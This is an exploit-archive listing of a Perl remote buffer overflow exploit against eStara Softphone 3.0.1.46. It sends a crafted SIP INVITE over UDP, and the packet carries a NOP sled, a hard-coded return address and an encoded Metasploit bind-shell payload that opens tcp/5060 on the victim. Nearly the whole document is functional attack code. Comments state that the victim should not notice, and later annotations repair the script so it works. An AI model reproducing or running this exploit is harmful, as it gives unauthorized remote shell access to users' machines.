
# Title : eStara Softphone <= 3.0.1.46 (SIP) Remote Buffer Overflow Exploit (2)
# Published : 2006-01-12
# Author : kokanin
# Previous Title : eStara Softphone <= 3.0.1.46 (SIP) Remote Buffer Overflow Exploit
# Next Title : Windows XP/2003 Metafile Escape() Code Execution Exploit (meta)


#!/usr/bin/perl -s
# damn-hippie.pl by kokanin (google estara, it shows sip stuff and a hippie)
# Remote "estara softphone" exploit, executable version info = 3.0.1.2
# kokanin did the research, metasploit.com did the encoded bindshell on tcp/5060
# Let's face it, most users won't know the difference between tcp and udp even
# if it bites them in the ass, so the port is chosen in the hope that NAT'ed
# users forward both tcp and udp port 5060 to their machine to make sip stuff
# work without all that hard thinking taking place.

# this used to be 0day, but I saw someone release something called estara.c
# on packetstorm today. I don't know if it's even the same bug, but this
# exploit is better anyway, so there.

# win32_bind, x00x0ax0d encoded, [ EXITFUNC=thread LPORT=5060 Size=399 ] 
# again, provided by http://metasploit.com (facing more stuff, I wouldn't know
# how to write win32 shellcode even if someone bit me in the ass :)
# since the shellcode exits the thread the user should not notice anything.

use IO::Socket;
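# Usage: damn-hippie.pl <target-host>
# The target is the only argument; stop with the author's note when it is
# missing. (The listing had lost the "\n" escape at the end of the message.)
if (!$ARGV[0]) {
    print "I am private, do not use me. Tell kokanin how you got me\n";
    exit(-1);
}

# Return address: a "jmp di" inside softphone.exe, described by the author as
# stable. It is hard-coded for one build of that binary; assume it has to be
# re-located for any other build or load address.
# pack("V") always emits a little-endian 32-bit value. The original pack("l")
# used the byte order of the machine running this script, which is only
# correct when the attacker's host happens to be little-endian like the target.
my $ret = pack("V", 0x0303DCDF);

# Total size of the NOP sled plus shellcode placed at the start of the SDP body.
my $buflen = 4099;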

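# win32_bind payload from metasploit.com: EXITFUNC=thread, LPORT=5060,
# 399 bytes. It is encoded so that none of \x00, \x0a or \x0d appear, because
# the bytes travel inside a text-based SIP/SDP message where those would end
# the string or a line. The "\x" escapes had been stripped from this listing;
# every byte below is a two-digit hex escape and the total is 399 bytes, which
# matches the size given in the header comment.
my $shellcode =
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x08\xb3".
"\x06\x82\x83\xeb\xfc\xe2\xf4\xf4\x5b\x50\x82\x08\xb3\x55\xd7\x5e".
"\xe4\x8d\xee\x2c\xab\x8d\xc7\x34\x38\x52\x87\x70\xb2\xec\x09\x42".
"\xab\x8d\xd8\x28\xb2\xed\x61\x3a\xfa\x8d\xb6\x83\xb2\xe8\xb3\xf7".
"\x4f\x37\x42\xa4\x8b\xe6\xf6\x0f\x72\xc9\x8f\x09\x74\xed\x70\x33".
"\xcf\x22\x96\x7d\x52\x8d\xd8\x2c\xb2\xed\xe4\x83\xbf\x4d\x09\x52".
"\xaf\x07\x69\x83\xb7\x8d\x83\xe0\x58\x04\xb3\xc8\xec\x58\xdf\x53".
"\x71\x0e\x82\x56\xd9\x36\xdb\x6c\x38\x1f\x09\x53\xbf\x8d\xd9\x14".
"\x38\x1d\x09\x53\xbb\x55\xea\x86\xfd\x08\x6e\xf7\x65\x8f\x45\x89".
"\x5f\x06\x83\x08\xb3\x51\xd4\x5b\x3a\xe3\x6a\x2f\xb3\x06\x82\x98".
"\xb2\x06\x82\xbe\xaa\x1e\x65\xac\xaa\x76\x6b\xed\xfa\x80\xcb\xac".
"\xa9\x76\x45\xac\x1e\x28\x6b\xd1\xba\xf3\x2f\xc3\x5e\xfa\xb9\x5f".
"\xe0\x34\xdd\x3b\x81\x06\xd9\x85\xf8\x26\xd3\xf7\x64\x8f\x5d\x81".
"\x70\x8b\xf7\x1c\xd9\x01\xdb\x59\xe0\xf9\xb6\x87\x4c\x53\x86\x51".
"\x3a\x02\x0c\xea\x41\x2d\xa5\x5c\x4c\x31\x7d\x5d\x83\x37\x42\x58".
"\xe3\x56\xd2\x48\xe3\x46\xd2\xf7\xe6\x2a\x0b\xcf\x82\xdd\xd1\x5b".
"\xdb\x04\x82\x1b\x77\x8f\x62\x62\xa3\x56\xd5\xf7\xe6\x22\xd1\x5f".
"\x4c\x53\xaa\x5b\xe7\x51\x7d\x5d\x93\x8f\x45\x60\xf0\x4b\xc6\x08".
"\x3a\xe5\x05\xf2\x82\xc6\x0f\x74\x97\xaa\xe8\x1d\xea\xf5\x29\x8f".
"\x49\x85\x6e\x5c\x75\x42\xa6\x18\xf7\x60\x45\x4c\x97\x3a\x83\x09".
"\x3a\x7a\xa6\x40\x3a\x7a\xa6\x44\x3a\x7a\xa6\x58\x3e\x42\xa6\x18".
"\xe7\x56\xd3\x59\xe2\x47\xd3\x41\xe2\x57\xd1\x59\x4c\x73\x82\x60".
"\xc1\xf8\x31\x1e\x4c\x53\x86\xf7\x63\x8f\x64\xf7\xc6\x06\xea\xa5".
"\x6a\x03\x4c\xf7\xe6\x02\x0b\xcb\xd9\xf9\x7d\x3e\x4c\xd5\x7d\x7d".
"\xb3\x6e\x6d\xc6\x53\x66\x7d\x5d\xb7\x37\x59\x5b\x4c\xd6\x82";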

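# Front-pad the shellcode with a NOP (0x90) sled up to exactly $buflen bytes,
# so the return address only has to land somewhere inside the sled rather
# than on the first shellcode byte. The "\x" escape had been stripped here.
my $buffer = "\x90" x ($buflen - length($shellcode)) . $shellcode;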

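# The SIP INVITE that carries the overflow in its SDP body. The header values
# are placeholders; the body starts with the padded buffer and the "o=" line
# carries the return address, which is the layout the author found to reach
# the saved return. Two things were lost from this listing and are restored:
# the "\r\n" terminators SIP requires, and the "\@" escapes -- an unescaped
# "@name" inside a double-quoted Perl string is interpolated as an array and
# would silently drop the "@host" part of every URI.
# NOTE(review): the declared Content-Length (4234) is a few bytes short of
# the body actually sent (4099 + the SDP lines below); the target evidently
# does not enforce it over UDP, so the published value is kept.
my $sipinvite =
    "INVITE sip:snotboble\@solgryn.fi.st SIP/2.0\r\n" .
    "Via: SIP/2.0/UDP abcdabcd.fi.st:1234;branch=somebranchidhere\r\n" .
    "From: 2448 <sip:kagemand\@abcdabcd.fi.st>;tag=2448\r\n" .
    "To: Receiver <sip:snotboble\@solgryn.fi.st>\r\n" .
    "Call-ID: 0\@abcdabcd.fi.st\r\n" .
    "CSeq: 1 INVITE\r\n" .
    "Contact: 2448 <sip:kagemand\@abcdabcd.fi.st>\r\n" .
    "Expires: 1200\r\n" .
    "Max-Forwards: 70\r\n" .
    "Content-Type: application/sdp\r\n" .
    "Content-Length: 4234\r\n" .
    "\r\n" .
    # SDP body: the overflowing field first, then the line holding $ret.
    $buffer .
    "=0\r\n" .
    "o=2448 2448 2448 IN IP4 " . $ret . "DCBA.fi.st\r\n" .
    "s=Session SDP\r\n" .
    "c=IN IP4 123.123.12.34\r\n" .
    "t=0 0\r\n" .
    "m=audio 9876 RTP/AVP 0\r\n" .
    "a=rtpmap:0 PCMU/8000\r\n" .
    "\r\n";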
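# Target host from the command line; the SIP signalling port 5060/udp is
# fixed (the bind shell in the payload listens on tcp/5060, see the header
# comment). Only run this against a system you are authorised to test.
my $host = $ARGV[0];
my $port = 5060;

# A "connected" UDP socket only fixes the peer address; it does not prove the
# target is reachable or that anything is listening on the port.
my $socket = IO::Socket::INET->new(
    Proto    => "udp",
    PeerAddr => $host,
    PeerPort => $port,
) or die "unable to connect to $host:$port ($!)\n";

# The whole exploit is a single datagram. A failed send used to be ignored
# and the script exited 0; report it instead.
print {$socket} $sipinvite or die "send to $host:$port failed ($!)\n";

close($socket);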
